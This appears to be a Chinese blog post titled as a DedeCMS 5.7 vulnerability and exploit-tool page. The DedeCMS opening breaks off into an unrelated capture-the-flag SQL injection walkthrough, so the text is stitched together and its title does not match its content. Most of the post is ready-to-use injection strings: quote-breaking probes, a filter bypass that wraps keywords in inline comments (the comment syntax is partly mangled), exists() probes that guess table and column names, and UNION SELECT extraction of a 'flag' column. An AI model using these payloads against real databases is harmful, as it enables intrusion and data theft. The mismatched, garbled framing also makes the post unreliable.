杂类

首页 » 归档 » 杂类 » dedecms,织梦5.7漏洞20150618,织梦漏洞利用小工具,织梦漏洞扫描,织梦漏洞利用,织梦漏洞检测,织梦注入,织梦最新版本漏洞

dedecms,织梦5.7漏洞20150618,织梦漏洞利用小工具,织梦漏洞扫描,织梦漏洞利用,织梦漏洞检测,织梦注入,织梦最新版本漏洞

DedeCMS V5.7 SP1正式版
源码发布日期20150618
安装的时候数据库的表前缀,用的dedecms默认的前缀dede_
member会员功能
special专题功能
company企业模块
plusguestbook留言板
以前五条存在一条即可

第一步先随便提交1
也就是?id=1 得到
ID: 1
name: baloteli

提交?id=1' 报错 near ''1'''
这是好事,说明单引号可以影响sql语句。
提交?id=1' or ''=' 得到
ID: 1' or ''='
name: baloteli
ID: 1' or ''='
name: kanawaluo
ID: 1' or ''='
name: dengdeng

这里ID很明显是自己所注入的语句,只有name才是当前表里面的数据,这里可以留个心眼(当前表估计只查找一列)
or没被干掉是万幸的万幸,接下来试试哪些关键字被干掉
试下and,提交?id=1' and 1=1 or''=' 报错,换大写也报错
既然被过滤掉了,就只能想想各种绕过法子
?id=1' /and/ 1=1 or''=' 没用
?id=1' /!and/ 1=1 or''=' 可以,这么走运就试出来可行法子

于是之后试了几个关键字,发现/!关键字/这样就可以绕过

猜表名
?id=' or /!exists/ (/!select/ /!from/ admin) /!and*/ ''='
报错Table 'web10.admin' doesn't exist
换flag猜下
?id=' or /!exists/ (/!select/ /!from/ flag) /!and*/ ''='
可以,那么就猜列名
?id=' or /!exists/ (/!select/ id /!from/ flag) /!and/ ''='
?id=' or /!exists/ (/!select/ name /!from/ flag) /!and/ ''='

都可以

联合查询
?id=' /!union/ /!select/ 1,2 /!from/ flag /!where/ ''='
报错The used SELECT statements have a different number of columns
?id=' /!union/ /!select/ 1 /!from/ flag /!where/ ''='
可以,也证明一开始的猜想,当前表只查找一列
?id=' /!union/ /!select/ name /!from/ flag /!where/ ''='
报错Unknown column 'name' in 'field list'

    • 这是大坑,明明之前exists判断出有name列,结果这里联合就报没有这个name列,肯定又做了什么手脚。

-----------
最后就是换了个列名,换flag这个列就可以过了。(语句就自己看上面)

[mp3 pic="http://p1.music.126.net/J293USE4KT2_9D9WL4UFbg==/7946170536288586.jpg" author="萌萌哒天团" audio="http://m2.music.126.net/h_sv6dvGGuZjRxXtSUOCKw==/3352410953754333.mp3" music_id="34532819"]明月[/mp3]

(1)

本文由 姬長信 创作,文章地址:https://blog.isoyu.com/archives/dedecms.html
采用知识共享署名4.0 国际许可协议进行许可。除注明转载/出处外,均为本站原创或翻译,转载前请务必署名。最后编辑时间为:7月 6, 2016 at 08:48 下午

热评文章

评论:

0 条评论,访客:0 条,博主:0 条
  1. 乌云提交了哦
    乌云提交了哦发布于: 

    提交了

发表评论

[必填]

看不清?

提交后请等待三秒以免造成未提交成功和重复